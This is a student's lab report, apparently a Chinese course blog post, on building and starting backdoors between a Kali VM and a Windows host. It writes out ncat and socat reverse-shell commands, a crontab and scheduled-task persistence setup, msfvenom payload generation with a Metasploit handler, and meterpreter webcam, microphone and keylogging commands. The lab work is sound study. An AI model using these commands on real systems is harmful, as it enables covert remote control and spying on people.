Exp2-后门原理与实践
一、基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
- 答:喜欢在百度云上下载文件(游戏,音乐,视频),然后不仔细查看文件内容,进而被文件内的某些可执行文件进入我的系统。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- 答:对于Windows,可以通过特定的exe可执行文件来启动,或通过计算机管理,在系统工具中的任务计划程序中创建任务,通过socat来进入;对于linux,也可以通过定时任务的设置进入后门。
(3)Meterpreter有哪些给你映像深刻的功能?
- 答:很简单容易地获取目标主机的摄像头、录音器功能,所以我们应该非必要时刻把主机的这些功能关闭,或者对主机定期查杀病毒。这些功能让我觉得自己的电脑非常的不安全,甚至有一丝可怕。
(4)如何发现自己有系统有没有被安装后门?
- 答:定期使用安全软件对主机进行一个全面的查杀病毒和补丁。尽量不要随意信任一些软件的权限申请,如若需要,则必须时刻注意主机的状态。
二、实验总结与体会
- 本次实验,对于我来说还是有不少问题,难度较大,在学习老师的教学视频和同学们的实验报告的过程中,在进行实验的过程中依然有着不少问题,通过这次实验,让我知道了防火墙,安全软件的重要性,如果没有这些软件,我们的电脑不知道啥时候就被攻击了,而且这些进入后门的方式各式各样的,无孔不入的。让我感觉到了很可怕。
三、实践过程记录
(1)使用netcat获取主机操作Shell,cron启动 (1分)
-
(a)首先在kali端输入
ifconfig
查找IP地址
在Windows端输入ipconfig
查找主机IP地址。
-
(b)接下来在Linux端运行监听指令:
ncat.exe -l -p 1224
在主机输入反弹连接:ncat -e cmd.exe 192.168.142.135 1224
如图所示是Linux成功获取Windowsshell并且运行dir指令截图:
-
(c)在主机输入监听指令
ncat.exe -l -p 1224
在虚拟机输入反弹连接:ncat 192.168.3.252 1224 -e /bin/sh
,
并且在主机输入ls查看kali虚拟机列表:
-
(d)在虚拟机启用cro并在主机进行监听
首先在kali虚拟机输入crontab -e
,然后输入2选择vim编辑器
-
并且在最后一行添加
10 * * * * nc 192.168.3.252 1224 -e /bin/sh
,即在每个小时的第10分钟反向连接Windows主机的1206端口

此处有crontab命令选项:
-u指定一个用户
-l列出某个用户的任务计划
-r删除某个用户的任务(不添加用户即删除所有的任务)
-e编辑某个用户的任务
cron文件语法:
分 小时 日 月 星期 命令
0-59 0-23 1-31 1-12 0-6 command (取值范围,0表示周日一般一行对应一个任务)
Minute Hour Day Month Dayofweek command
分钟 小时 天 月 天每星期 命令
- 在主机cmd输入
ncat.exe -l -p 1224
等待每小时的第10分钟定时反向连接启动
(2)使用socat获取主机操作Shell, 任务计划启动 (1分)
-
使用
socat -h
查看kali中的socat是否正常。
-
在Windows中按
Win+R
,再输入compmgmt.msc
打开计算机管理
-
在系统工具中的任务计划程序中创建任务,命名为20201224
设置一个触发器,这里设置当锁定任何用户工作站时
-
新建操作,找到socat.exe文件,并添加参数
tcp:192.168.3.252:1224 exec:cmd.exe,pty,stderr
-
先在kali中输入socat top-listen:1224 -
监听端口,然后使用
Win+L```将电脑锁屏再打开,让我们设置的任务定向启动socat.exe:
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)
-
在kali输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.252 LPORT=1224 -f exe > 20201224_backdoor.exe
生成后门可执行程序
在Windows输入nc 192.168.3.252 1224 < 20201224_backdoor.exe
打开监听
-
然后在Linux端用nc 192.168.3.252 1224 < 20201224_backdoor.exe将生成的20201224_backdoor.exe传到Windows端
-
在Linux上使用
msfconsole
指令进入msf控制台
对msf控制台进行配置,依次输入以下命令:
use exploit/multi/handler #使用监听模块,设置payload
set LHOST 192.168.3.252 #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1224
set payload windows/meterpreter/reverse_tcp #使用和生成后门程序时相同的payload
输入run开始监听,在Windows端在打开20201224_backdoor.exe后,在Linux端成功获取到Windows的shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (1分)
-
(a)获取摄像头
先输入webcam_list查看摄像头列表,再输入webcam_snap指令控制摄像头进行拍照
-
(b)获取音频
输入record_mic进行录音
-
(c)获取击键记录
输入keyscan_start开始捕获键盘记录,keyscan_dump获取击键记录
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通